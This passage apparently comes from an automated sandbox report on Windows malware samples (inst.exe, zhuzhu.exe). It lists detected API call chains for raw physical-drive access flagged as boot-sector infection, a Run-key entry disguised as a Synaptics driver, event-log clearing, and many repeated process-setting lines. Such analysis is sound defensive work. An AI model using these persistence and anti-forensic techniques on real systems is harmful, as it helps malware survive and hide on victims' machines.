                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00199A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,12_2_00199A0C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001CDA24 GetPrivateProfileStringW,12_2_001CDA24

                                      Boot Survival

                                      barindex
                                      Contains functionality to infect the boot sector
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d7_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d7_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D1BEB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d7_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d12_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d12_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d12_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D1BEB
                                      Source: C:\Users\user\Desktop\zhuzhu.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior

                                      Hooking and other Techniques for Hiding and Protection

                                      barindex
                                      Loading BitLocker PowerShell Module
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001BA4F6 __EH_prolog3,IsIconic,ShowWindow,7_2_001BA4F6
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00196727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,7_2_00196727
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00195C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,7_2_00195C31
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00196727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,12_2_00196727
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00195C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,12_2_00195C31
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0377B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_0377B3C0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00185706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00185706
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
